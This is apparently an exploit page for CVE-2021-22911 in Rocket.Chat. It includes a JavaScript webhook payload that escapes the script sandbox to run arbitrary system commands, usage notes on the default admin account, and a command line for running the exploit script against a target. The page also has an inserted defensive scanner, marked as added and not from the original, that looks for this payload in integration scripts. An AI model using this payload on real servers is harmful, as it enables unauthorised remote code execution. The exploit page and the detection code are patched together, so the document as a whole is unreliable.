## https://sploitus.com/exploit?id=20192387-7625-5BDB-89FD-50906A88FDBD
# CVE-2021-22911-EXP
## Info
Some small changes to the [code](https://github.com/CsEnox/CVE-2021-22911) by CsEnox:
1. Replace the `oathtool` library with the `pyotp` library.
2. Modify the format of the JavaScript script used to construct the webhook.
```javascript
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('your command');
  }
}
```
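For administrators reviewing a server, the following added example (not part of the original repository or of CsEnox's code) scans incoming-webhook integration scripts for the constructs used in the script above. The `{ name, script }` record shape, the function names and the sample records are assumptions constructed for illustration.

```javascript
// Indicators drawn from the webhook script shown above (heuristic, not exhaustive).
const INDICATORS = [
  { id: 'function-constructor', re: /\.constructor\s*\(/ },
  { id: 'mainmodule-require', re: /process\s*\.\s*mainModule/ },
  { id: 'child-process', re: /child_process/ },
  { id: 'command-exec', re: /\b(?:exec|execSync|execFile|spawn|spawnSync)\s*\(/ },
];

// Join adjacent string literals ('child_' + 'process') so split strings still match.
function normalise(src) {
  return src.replace(/['"`]\s*\+\s*['"`]/g, '');
}

// Return the ids of every indicator present in one integration script.
function scanScript(src) {
  const text = normalise(String(src || ''));
  return INDICATORS.filter(({ re }) => re.test(text)).map(({ id }) => id);
}

// Audit integration records ({ name, script }); the record shape is an assumption.
function auditIntegrations(records) {
  return records
    .map(({ name, script }) => ({ name, hits: scanScript(script) }))
    .filter(({ hits }) => hits.length > 0)
    .map((r) => ({ ...r, severity: r.hits.length >= 2 ? 'high' : 'review' }));
}

// Constructed sample data, not taken from a real server.
const SAMPLE = [
  { name: 'ci-notify', script: `class Script {
  process_incoming_request({ request }) {
    return { content: { text: 'Build ' + request.content.status } };
  }
}` },
  { name: 'hook-1', script: `class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('your command');
  }
}` },
  { name: 'hook-2', script: "const m = 'child_' + 'process'; load(m);" },
];

console.log(JSON.stringify(auditIntegrations(SAMPLE), null, 2));
```

A single hit is marked `review` rather than `high` because a lone pattern such as `child_process` can also appear in commented-out or otherwise inert text.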
## Notice
1. You can check whether the webhook executed successfully using the `wget` command, provided that `wget` is installed in the Docker container.
2. The default administrator username in the code is `admin`.
## Usage
```cmd
python exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```